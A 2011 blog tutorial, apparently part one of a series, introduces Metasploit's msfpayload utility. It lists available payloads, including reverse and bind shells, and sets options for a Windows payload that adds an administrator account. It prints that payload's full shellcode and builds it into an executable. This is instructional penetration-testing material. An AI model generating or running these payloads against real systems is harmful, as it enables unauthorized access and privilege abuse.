December 5, 2011

Metasploit's "other" utilities unleashed - I

Metasploit is a huge tool. When I started learning and playing with it, all I knew was use,set,exploit and run.
That was awesome and I was happy with that. But then, I came to know that many Metasploit  users don't even use the framework to its 50% capabilities. So I started exploring in the Metasploit directory and lo, so many utilities were sitting there begging me to use them! In this multi part series, I will introduce all these little gems that are packed in the Metasploit directory, ready to make your life a lot easier.

msfpayload
This is a command line utility in Metasploit, it is used for generating shellcode or a standalone payload which can be delivered to the victim for execution. Its real benefits are realized when developing new exploit modules and testing different types of shellcode with it.
The syntax for msfpayload is very simple.

Syntax:

Usage: ./msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>


OPTIONS:


    -h        Help banner
    -l        List available payloads

msfpayload -l
Lists all available payload as expected.


Framework Payloads (228 total)
==============================


    Name                                             Description
    ----                                             -----------
    aix/ppc/shell_bind_tcp                           Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                          Spawn a shell on an established connection
    aix/ppc/shell_interact                           Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    bsd/sparc/shell_bind_tcp                         Listen for a connection and spawn a command shell
    bsd/sparc/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
    bsd/x86/exec                                     Execute an arbitrary command
    bsd/x86/metsvc_bind_tcp                          Stub payload for interacting with a Meterpreter Service
    bsd/x86/metsvc_reverse_tcp                       Stub payload for interacting with a Meterpreter Service
    bsd/x86/shell/bind_tcp                           Listen for a connection, Spawn a command shell (staged)
    bsd/x86/shell/find_tag                           Use an established connection, Spawn a command shell (staged)
    bsd/x86/shell/reverse_tcp                        Connect back to the attacker, Spawn a command shell (staged)
    bsd/x86/shell_bind_tcp                           Listen for a connection and spawn a command shell
    bsd/x86/shell_find_port                          Spawn a shell on an established connection
    bsd/x86/shell_find_tag                           Spawn a shell on an established connection (proxy/nat safe)
    bsd/x86/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    bsdi/x86/shell/bind_tcp                          Listen for a connection, Spawn a command shell (staged)
    bsdi/x86/shell/reverse_tcp                       Connect back to the attacker, Spawn a command shell (staged)
    bsdi/x86/shell_bind_tcp                          Listen for a connection and spawn a command shell
    bsdi/x86/shell_find_port                         Spawn a shell on an established connection
    bsdi/x86/shell_reverse_tcp                       Connect back to attacker and spawn a command shell
    cmd/unix/bind_inetd                              Listen for a connection and spawn a command shell (persistent)
    cmd/unix/bind_netcat                             Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_perl                               Listen for a connection and spawn a command shell via perl
    cmd/unix/bind_ruby                               Continually listen for a connection and spawn a command shell via Ruby
    cmd/unix/generic                                 Executes the supplied command
    cmd/unix/interact                                Interacts with a shell on an established socket connection
--snip--


After choosing payload, available variables for that payload can be listed out by using 'O' or 'S' argument.


./msfpayload windows/adduser S
  Name: Windows Execute net user /ADD
  Module: payload/windows/adduser
  Version: 13053, 9179
  Platform: Windows
  Arch: x86
  Needs Admin: Yes
  Total size: 287
  Rank: Normal

Provided by:
  hdm <hdm@metasploit.com>
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
PASS      metasploit       yes       The password for this user
USER      metasploit       yes       The username to create

Description:
  Create a new user and add them to local administration group


So, from the above information, we know that this payload requires 3 options to be set. We can change the values of these options if needed.


./msfpayload windows/adduser PASS=betterhacker USER=betterhacker O

--snip--


Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
PASS      betterhacker     yes       The password for this user
USER      betterhacker     yes       The username to create

This way all available options for a payload can be modified. For example, if a payload requires you to provide RHOST IP address, you can mention it on the command line specifying its value.

./msfpayload windows/meterpreter/bind_tcp RHOST=192.168.1.2

The last part in the command syntax is the output format of this shellcode. Following types of outputs are supported: C, Perl, Ruby, Javascript, Exe, Dll, VBA, Raw

./msfpayload windows/adduser C

/*
 * windows/adduser - 287 bytes
 * http://www.metasploit.com
 * VERBOSE=false, EXITFUNC=process, USER=metasploit, 
 * PASS=metasploit
 */
unsigned char buf[] = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x6d\x65\x74"
"\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44\x44\x20\x26\x26"
"\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70"
"\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44"
"\x44\x00";

Now this shellcode can be directly used in an exploit!

We can also create an executable from msfpayload.
./msfpayload windows/adduser USER=betterhacker PASS=betterhacker X > adduser.exe

Created by msfpayload (http://www.metasploit.com).

Payload: windows/adduser
 Length: 293
Options: {"USER"=>"betterhacker", "PASS"=>"betterhacker"}

This creates an exe file with name 'adduser.exe'
It wont work as yet, because we haven't added executable rights to it. To do that:
chmod +x adduser.exe 

Now, this little executable is ready to be executed and it works!
That is it for msfpayload. In the next part we will see msfencode and msfvenom